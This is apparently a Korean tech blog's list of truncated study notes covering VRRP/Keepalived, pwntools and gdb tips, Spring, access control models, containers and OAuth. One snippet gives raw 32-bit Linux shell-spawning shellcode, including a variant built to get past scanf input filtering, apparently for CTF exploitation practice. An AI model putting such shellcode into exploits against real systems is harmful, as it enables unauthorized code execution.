네른

분산처리 관련해서 작업하다가, Keepalived를 사용하게 됨. VRRP라는걸 사용한다고 함. Virtual Router Redundancy Protocol의 약자로, master router와 backup router를 두어 사용하게 되며, 두 라우터에게 Virtual IP를 부여해서 가용성 유지에 사용 가능함. VRRPv2 프로토콜을 사용한다고 하며, 멀티캐스팅에 224.0.0.18 주소를 사용한다고 함. - 224.0.0.18과 통신하는 패킷을 확인하면 현재 네트워크 내의 VRRP 구성 정보를 알 수 있음. - VRID 라는 값에 따라 각 그룹을 나누게 되므로, 이 값은 중복되면 안됨. - 만약 master가 죽은 경우, backup이 Gratutious ARP 라는 arp 패킷을 전송함. 이를 ..

pwntools를 설치할 때 보통 같이 설치되며 ~/.local/bin/checksec에 위치 checksec ./binary 와 같이 사용하면 바이너리에 적용된 보호기법을 알 수 있음

scanf 함수의 경우 \x09, \x0a, \x0b, \x0c, \x0d, \x20 를 읽지 못함 그리고 기본 25byte짜리 쉘코드(pwntools의 shellcraft.i386.linux.sh())에는 0xb가 들어있다

우회가 필요한 경우 사용해야하는 쉘코드들 32bit shellcode 6 Bytes Shell Code \x31\xc0\xb0\x01\xcd\x80 25 Bytes Shell Code (기본 쉘코드) \x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80 26 Bytes Shell Code (scanf 우회 쉘코드) \x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x31\xc9\x31\xd2\xb0\x08\x40\x40\x40\xcd\x80 41 Bytes Shell Code (setreuid(geteuid(), getr..

전까지 쓰던 r c b ni 등등 말고 추가로 알게된 tele와 vmmap tele : 메모리 덤프 기능으로, 메모리가 참고중인 주소를 재귀적으로 탐색하여 값을 보여줌 vmmap : 가상 메모리 레이아웃을 보여줌

ln -s "/mnt/c/Users/윈도우즈 사용자명/Documents/Projects" /home/리눅스 사용자명(홈디렉토리명)/Projects 출처: https://webdir.tistory.com/542 [WEBDIR]

Spring Framework 스프링 프레임워크는 자바 플랫폼을 위한 오픈소스 앱 프레임워크로, 동적 웹 사이트를 개발하기 위한 기능들을 제공한다. 스프링 프레임워크가 가진 특징은 다음과 같다. 1. 경량 컨테이너로 구성되어있으며, 자바 객체를 관리할 수 있음 - 객체의 생성, 소멸과 같은 라이프사이클을 관리할 수 있음 2. Inversion of Control(제어의 역전) - 본래 프로그램은 개겣를 만들고 메소드를 호출하는 과정을 사용자가 구성한 대로 진행됨 - 그러나 스프링은 프로그램의 제어권이 프레임워크 자체에 있어, 필요에 따라 스프링이 사용자의 코드를 호출하는 구성이다. - 즉, 특별한 제어 객체에게 결정권을 위임하고, 해당 객체가 결정을 알아서 진행한다. 3. Dependency Inject..

DAC(Discretionary) : 자원에 대한 접근통제를 사용자 계정이(자원 소유자) 임의대로 할 수 있음 MAC(Mandatory) : 자원에 대한 접근통제는 오로지 관리자에 의해서만 가능함. 관리자만이 유저별 보안등급, 객체별 보안등급을 수정하고 설정할 수 있음 RBAC(Role-Based Access Control) : 관리자가 각 사용자에게 역할을 부여하고, 자원들은 사용자의 역할에 따라 접근 가능 여부가 나뉨.

Container VM (Virtual Machine)은 하드웨어 가상화를 통해서 기존의 Host OS 위에 새로운 Guest OS를 얹어 별개의 독립된 운영체제를 구동하는 데 사용된다. 반면, 컨테이너(Container)는 기존의 Host OS 위에 컨테이너를 관리하는 별도의 소프트웨어가 개별 컨테이너(앱 + 서비스 + 미들웨어 등)를 관리하기에 동일한 OS를 공유하게 된다. 하지만 동시에, 각 컨테이너는 개별 파일 시스템, CPU, 프로세스 공간(Memory) 등을 가지게 된다. 컨테이너는 기존에 리눅스 계열에서 사용하던 1. chroot : 특정 디렉토리를 새로운 최상위 디렉토리(root directory)로 설정하게 하는 명령어 2. Namespace : 프로세스별로 독립적인 공간을 할당하여 관리..

OAuth OAuth는 접근 위임을 위한 개방형 표준을 의미한다. - 즉, 내 정보에 대한 타인의 접근을 허용(인가)하기 위한 공개된 표준이다! - OAuth를 이용하여 Authentication(인증)도 가능하지만, 주된 목적은 Authorization에 있다. 다시 말해, 제 3자가 별도의 인증정보 제공 없이 다른 웹사이트의 데이터에 접근 권한을 얻을 수 있는 것이다. (주로 API를 이용하여 데이터를 받아오거나 하는 용도) - 모바일 게임을 플레이하다보면, 특정 이벤트를 사용자의 페이스북 담벼락에 업로드하고자 한다. 이 때 사용되는 것이 OAuth이며, 해당 앱은 나에게 "당신의 담벼락에 내가 API를 이용해 글을 써도 됩니까?" 라고 묻는다. - 그래서 OAuth는 사용하고자 하는 데이터의 주체(..